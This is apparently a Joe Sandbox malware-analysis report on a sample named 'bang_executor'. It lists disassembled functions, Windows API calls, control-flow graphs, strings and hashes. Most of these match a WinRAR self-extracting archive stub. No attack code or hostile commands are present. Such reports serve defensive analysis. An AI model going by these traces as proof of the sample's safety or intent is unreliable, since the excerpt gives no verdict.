                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00500404
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00500455
                                          • Part of subcall function 004FFFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004FFFFE
                                          • Part of subcall function 004FFFDD: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00500038
                                          • Part of subcall function 004F1421: _wcslen.LIBCMT ref: 004F1445
                                        • CloseHandle.KERNEL32(00000000), ref: 0050045C
                                        • GetModuleFileNameW.KERNEL32(00000000,00542CC0,00000800), ref: 00500476
                                        • SetEnvironmentVariableW.KERNEL32(sfxname,00542CC0), ref: 00500482
                                        • GetLocalTime.KERNEL32(?), ref: 0050048D
                                        • _swprintf.LIBCMT ref: 005004E1
                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 005004F6
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 005004FD
                                        • LoadIconW.USER32(00000000,00000064), ref: 00500514
                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001DAE0,00000000), ref: 00500565
                                        • Sleep.KERNELBASE(?), ref: 00500593
                                        • DeleteObject.GDI32 ref: 005005CC
                                        • DeleteObject.GDI32(?), ref: 005005DC
                                        • CloseHandle.KERNEL32 ref: 0050061F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$pPR$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                        • API String ID: 3014515783-2929405500
                                        • Opcode ID: 54f1e53e238cc103600b5800eec400d320033b134a080af8a86be01a11601032
                                        • Instruction ID: b66afe68b808a3ff74bc80decea5e5e24fc69d193f62add269ca3a643c88924f
                                        • Opcode Fuzzy Hash: 54f1e53e238cc103600b5800eec400d320033b134a080af8a86be01a11601032
                                        • Instruction Fuzzy Hash: 30712570500344ABD720AB62EC49BBF7FA8BF56709F00441AF645922E2DF758D4CDBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FC652 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100memorywindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 446 4fc652-4fc66f FindResourceW 447 4fc76b 446->447 448 4fc675-4fc686 SizeofResource 446->448 449 4fc76d-4fc771 447->449 448->447 450 4fc68c-4fc69b LoadResource 448->450 450->447 451 4fc6a1-4fc6ac LockResource 450->451 451->447 452 4fc6b2-4fc6c7 GlobalAlloc 451->452 453 4fc6cd-4fc6d6 GlobalLock 452->453 454 4fc763-4fc769 452->454 455 4fc75c-4fc75d GlobalFree 453->455 456 4fc6dc-4fc6fa call 504250 453->456 454->449 455->454 460 4fc6fc-4fc71e call 4fc5b6 456->460 461 4fc755-4fc756 GlobalUnlock 456->461 460->461 466 4fc720-4fc728 460->466 461->455 467 4fc72a-4fc73e GdipCreateHBITMAPFromBitmap 466->467 468 4fc743-4fc751 466->468 467->468 469 4fc740 467->469 468->461 469->468
                                        APIs
                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,004FDA3D,00000066), ref: 004FC665
                                        • SizeofResource.KERNEL32(00000000,?,?,?,004FDA3D,00000066), ref: 004FC67C
                                        • LoadResource.KERNEL32(00000000,?,?,?,004FDA3D,00000066), ref: 004FC693
                                        • LockResource.KERNEL32(00000000,?,?,?,004FDA3D,00000066), ref: 004FC6A2
                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,004FDA3D,00000066), ref: 004FC6BD
                                        • GlobalLock.KERNEL32(00000000,?,?,?,?,?,004FDA3D,00000066), ref: 004FC6CE
                                        • GlobalUnlock.KERNEL32(00000000), ref: 004FC756
                                          • Part of subcall function 004FC5B6: GdipAlloc.GDIPLUS(00000010), ref: 004FC5BC
                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 004FC737
                                        • GlobalFree.KERNEL32(00000000), ref: 004FC75D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                        • String ID: FjuKP$PNG
                                        • API String ID: 541704414-1231597661
                                        • Opcode ID: 1c86261ad9dd651bb7103f238dfef9fcfdc57701d2f309370416452d5b8cff09
                                        • Instruction ID: 2795e08b7ad16125aed1d84c9af615f6af60e00e0e1713b519be295ce21f2066
                                        • Opcode Fuzzy Hash: 1c86261ad9dd651bb7103f238dfef9fcfdc57701d2f309370416452d5b8cff09
                                        • Instruction Fuzzy Hash: 9A31C17560070AABC310AF21DD88D6B7FE8EF957617044529FA0582261EB35D808EFA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EF963 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 684COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,08ADEBCE), ref: 004EF9CD
                                          • Part of subcall function 004EE208: _wcslen.LIBCMT ref: 004EE210
                                          • Part of subcall function 004F2663: _wcslen.LIBCMT ref: 004F2669
                                          • Part of subcall function 004F3D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,08ADEBCE,?,?,08ADEBCE,00000001,004EDA04,00000000,08ADEBCE,?,0001045C,?,?), ref: 004F3D2C
                                        • _wcslen.LIBCMT ref: 004EFD00
                                        • __fprintf_l.LIBCMT ref: 004EFE50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$ByteCharFileModuleMultiNameWide__fprintf_l
                                        • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL$|lQ
                                        • API String ID: 2646189078-3663991832
                                        • Opcode ID: 5dc5da334b55f0ee6cc37b7f6c9cf4dfcc227249c4a680db218caca809700946
                                        • Instruction ID: de26215642a1f838b73e79ad08bb8ecda6d419062265e052318471f3b78c4800
                                        • Opcode Fuzzy Hash: 5dc5da334b55f0ee6cc37b7f6c9cf4dfcc227249c4a680db218caca809700946
                                        • Instruction Fuzzy Hash: 38420471900299ABDF24EFA5CC41BFEB7B4FF44304F50052BEA05AB281EB795A45CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EC4A8 Relevance: 7.6, APIs: 5, Instructions: 111fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1097 4ec4a8-4ec4e3 call 501590 1100 4ec548-4ec551 FindNextFileW 1097->1100 1101 4ec4e5-4ec4f0 FindFirstFileW 1097->1101 1103 4ec563-4ec606 call 4f268b call 4ee27e call 4f3724 * 3 1100->1103 1104 4ec553-4ec561 GetLastError 1100->1104 1102 4ec4f2-4ec507 call 4eda1e 1101->1102 1101->1103 1111 4ec509-4ec520 FindFirstFileW 1102->1111 1112 4ec522-4ec52b GetLastError 1102->1112 1109 4ec60b-4ec62c call 5010f9 1103->1109 1106 4ec53d-4ec543 1104->1106 1106->1109 1111->1103 1111->1112 1116 4ec52d-4ec530 1112->1116 1117 4ec53b 1112->1117 1116->1117 1120 4ec532-4ec535 1116->1120 1117->1106 1120->1117 1122 4ec537-4ec539 1120->1122 1122->1106
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?,00000000), ref: 004EC4E6
                                          • Part of subcall function 004EDA1E: _wcslen.LIBCMT ref: 004EDA59
                                        • FindFirstFileW.KERNEL32(?,00000000,?,?,00000800,?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?), ref: 004EC516
                                        • GetLastError.KERNEL32(?,?,00000800,?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?,00000000,0000003A), ref: 004EC522
                                        • FindNextFileW.KERNEL32(?,?,00000000,?,?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?,00000000), ref: 004EC549
                                        • GetLastError.KERNEL32(?,?,004EC39F,000000FF,?,?,?,?,004E87BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 004EC555
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                        • String ID:
                                        • API String ID: 42610566-0
                                        • Opcode ID: 9e8c841639f2145020170e7bc48626a3db618cd8fc632c553875bcf123d00762
                                        • Instruction ID: c2389d9cc50c1894ab3b64ee67c1459edd8f4ce8be5bdadd58a628cf2a8ba3ca
                                        • Opcode Fuzzy Hash: 9e8c841639f2145020170e7bc48626a3db618cd8fc632c553875bcf123d00762
                                        • Instruction Fuzzy Hash: 3E4183B1508285ABC324DF25D8C49EBF7E8BF88341F00491EF59AD3240D734A949CB96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FCEBF Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1126 4fcebf-4fcee3 call 4fd392 1129 4fcee9-4fcf28 SetEntriesInAclW 1126->1129 1130 4fcf77-4fcf86 call 5010f9 1126->1130 1132 4fcf2a-4fcf37 InitializeSecurityDescriptor 1129->1132 1133 4fcf75-4fcf76 1129->1133 1135 4fcf39-4fcf4a SetSecurityDescriptorDacl 1132->1135 1136 4fcf67-4fcf6a 1132->1136 1133->1130 1135->1136 1137 4fcf4c-4fcf61 CreateDirectoryW 1135->1137 1136->1133 1138 4fcf6c-4fcf6f LocalFree 1136->1138 1137->1136 1138->1133
                                        APIs
                                          • Part of subcall function 004FD392: GetCurrentProcess.KERNEL32(00020008,?), ref: 004FD3A1
                                          • Part of subcall function 004FD392: OpenProcessToken.ADVAPI32(00000000), ref: 004FD3A8
                                          • Part of subcall function 004FD392: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 004FD3C2
                                          • Part of subcall function 004FD392: GetLastError.KERNEL32 ref: 004FD3CC
                                          • Part of subcall function 004FD392: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 004FD3F0
                                          • Part of subcall function 004FD392: CopySid.ADVAPI32(00000044,?,00000000), ref: 004FD401
                                        • SetEntriesInAclW.ADVAPI32(00000001,?,00000000,?), ref: 004FCF20
                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 004FCF2F
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004FCF42
                                        • CreateDirectoryW.KERNELBASE(?,?), ref: 004FCF61
                                        • LocalFree.KERNEL32(?), ref: 004FCF6F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Token$DescriptorInformationProcessSecurity$CopyCreateCurrentDaclDirectoryEntriesErrorFreeInitializeLastLocalOpen
                                        • String ID:
                                        • API String ID: 2740647886-0
                                        • Opcode ID: 35c319afdc5e31c13a834ea8c5867f527cc63f1200d05d9305f4d8cdadd1daa2
                                        • Instruction ID: 15568502f063988834ecc1fd0c9ad5baf3a3552c7a52a737563050f6d53d0066
                                        • Opcode Fuzzy Hash: 35c319afdc5e31c13a834ea8c5867f527cc63f1200d05d9305f4d8cdadd1daa2
                                        • Instruction Fuzzy Hash: 6D2105B190020DABDB10CFA5D9889EFBBFCFF49304F00812AB915D2250E734DA19DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050A640 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,0050A616,?,0051F7B0,0000000C,0050A76D,?,00000002,00000000), ref: 0050A661
                                        • TerminateProcess.KERNEL32(00000000,?,0050A616,?,0051F7B0,0000000C,0050A76D,?,00000002,00000000), ref: 0050A668
                                        • ExitProcess.KERNEL32 ref: 0050A67A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: b2f364b42da9ba77ebfb6ece3fbb25a49d81eefb148953cf1ad1c8af9652c9ba
                                        • Instruction ID: 7b10c5a9d4460e08ea3808fdccd3aa608f4c78dfd2896e3173b85c71c007479c
                                        • Opcode Fuzzy Hash: b2f364b42da9ba77ebfb6ece3fbb25a49d81eefb148953cf1ad1c8af9652c9ba
                                        • Instruction Fuzzy Hash: 23E0B635440208AFCF116F64DD0DA9C3F7AFB94781F048414F8098A172DB37ED46DA95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E9906 Relevance: 2.4, Strings: 1, Instructions: 1169COMMON
                                        Download Yara Rule
                                        Strings
                                        • __tmp_reference_source_, xrefs: 004E9C0E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$AttributesFile_swprintf$CurrentH_prolog3Process__aulldiv_wcsrchr
                                        • String ID: __tmp_reference_source_
                                        • API String ID: 3636405837-685763994
                                        • Opcode ID: 9b507845192e53ac69e156e7d647fccdff1d53e26e454047c4fb0371b3c4dae6
                                        • Instruction ID: 835b14e844d7a5b8c2da4c829142cc3e0850a98a7bd2bd407a0599a3b37c14a9
                                        • Opcode Fuzzy Hash: 9b507845192e53ac69e156e7d647fccdff1d53e26e454047c4fb0371b3c4dae6
                                        • Instruction Fuzzy Hash: B6A248305042C5AEDF25DF62C884BEF7BA4BF05305F0841BBDD499B282D7386955C7AA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F8C7E Relevance: .3, Instructions: 349COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID:
                                        • API String ID: 431132790-0
                                        • Opcode ID: 827ea4e74991c9796b12337d907de68f736f20a140f496ae5053f4e782595e9e
                                        • Instruction ID: 84391659dc911df2bfaaed0a587b97b75c6836c9080d37f5fc2149f1f418ff9e
                                        • Opcode Fuzzy Hash: 827ea4e74991c9796b12337d907de68f736f20a140f496ae5053f4e782595e9e
                                        • Instruction Fuzzy Hash: 07D1B7716083498FDB14DF29C84476BBBE1BF85308F04456EEA899B342DB78ED05CB5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F290A Relevance: 101.8, APIs: 23, Strings: 35, Instructions: 327libraryfileloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4f290a-4f2941 call 501590 GetModuleHandleW 3 4f2999-4f2bfa 0->3 4 4f2943-4f2953 GetProcAddress 0->4 5 4f2cda 3->5 6 4f2c00-4f2c0d call 509e7e 3->6 7 4f296d-4f297d GetProcAddress 4->7 8 4f2955-4f296b 4->8 10 4f2cdc-4f2d08 GetModuleFileNameW call 4ee208 call 4f268b 5->10 6->10 17 4f2c13-4f2c41 GetModuleFileNameW CreateFileW 6->17 7->3 9 4f297f-4f2994 7->9 8->7 9->3 24 4f2d0a-4f2d16 call 4ed076 10->24 19 4f2ccc-4f2cd8 CloseHandle 17->19 20 4f2c47-4f2c53 SetFilePointer 17->20 19->10 20->19 23 4f2c55-4f2c71 ReadFile 20->23 23->19 25 4f2c73-4f2c7f 23->25 34 4f2d18-4f2d23 call 4f28ab 24->34 35 4f2d45-4f2d6c call 4ee27e GetFileAttributesW 24->35 27 4f2ede-4f2ee3 call 5013f9 25->27 28 4f2c85-4f2ca4 25->28 31 4f2cc1-4f2cca call 4f23d6 28->31 31->19 40 4f2ca6-4f2cc0 call 4f28ab 31->40 34->35 42 4f2d25-4f2d35 34->42 43 4f2d6e-4f2d72 35->43 44 4f2d76 35->44 40->31 49 4f2d40-4f2d43 42->49 43->24 47 4f2d74 43->47 48 4f2d78-4f2d7d 44->48 47->48 50 4f2d7f 48->50 51 4f2db4-4f2db6 48->51 49->35 49->43 54 4f2d81-4f2da8 call 4ee27e GetFileAttributesW 50->54 52 4f2dbc-4f2dd3 call 4ee252 call 4ed076 51->52 53 4f2ec3-4f2edb call 5010f9 51->53 66 4f2e3b-4f2e6e call 4e4c00 AllocConsole 52->66 67 4f2dd5-4f2e36 call 4f28ab * 2 call 4f0597 call 4e4c00 call 4f0597 call 4fc774 52->67 62 4f2daa-4f2dae 54->62 63 4f2db2 54->63 62->54 64 4f2db0 62->64 63->51 64->51 72 4f2ebb-4f2ebd ExitProcess 66->72 73 4f2e70-4f2eb5 GetCurrentProcessId AttachConsole call 506433 GetStdHandle WriteConsoleW Sleep FreeConsole 66->73 67->72 73->72
                                        APIs
                                        • GetModuleHandleW.KERNEL32 ref: 004F2937
                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004F2949
                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004F2973
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004F2C1D
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F2C37
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004F2C4B
                                        • ReadFile.KERNEL32(00000000,?,00007FFE,$oQ,00000000), ref: 004F2C69
                                        • CloseHandle.KERNEL32(00000000), ref: 004F2CCD
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004F2CE6
                                        • CompareStringW.KERNEL32(00000400,00001001,poQ,?,DXGIDebug.dll,?,$oQ,?,00000000,?,00000800), ref: 004F2D3A
                                        • GetFileAttributesW.KERNELBASE(?,?,$oQ,00000800,?,00000000,?,00000800), ref: 004F2D64
                                        • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 004F2DA0
                                          • Part of subcall function 004F28AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004F28D4
                                          • Part of subcall function 004F28AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004F1309,Crypt32.dll,00000000,004F1383,00000200,?,004F1366,00000000,00000000,?), ref: 004F28F4
                                        • _swprintf.LIBCMT ref: 004F2E12
                                        • _swprintf.LIBCMT ref: 004F2E5E
                                        • AllocConsole.KERNEL32 ref: 004F2E66
                                        • GetCurrentProcessId.KERNEL32 ref: 004F2E70
                                        • AttachConsole.KERNEL32(00000000), ref: 004F2E77
                                        • _wcslen.LIBCMT ref: 004F2E8C
                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004F2E9D
                                        • WriteConsoleW.KERNEL32(00000000), ref: 004F2EA4
                                        • Sleep.KERNEL32(00002710), ref: 004F2EAF
                                        • FreeConsole.KERNEL32 ref: 004F2EB5
                                        • ExitProcess.KERNEL32 ref: 004F2EBD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite_wcslen
                                        • String ID: $oQ$$rQ$$sQ$(pQ$(tQ$,qQ$4sQ$<$<oQ$<rQ$@pQ$DXGIDebug.dll$DqQ$DtQ$LsQ$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$XoQ$XpQ$\qQ$\tQ$`rQ$dsQ$dwmapi.dll$kernel32$poQ$ppQ$tqQ$uxtheme.dll$xrQ$xsQ$xtQ$oQ$pQ
                                        • API String ID: 270162209-3066497542
                                        • Opcode ID: 56be42ef1b0f47f2eacc54312db6d79cb66e4c63dda135be7d9620c19e95fdf8
                                        • Instruction ID: ed5bc105843a6a99b3283c951779427213b43be60b2300faca6fee923e0ac967
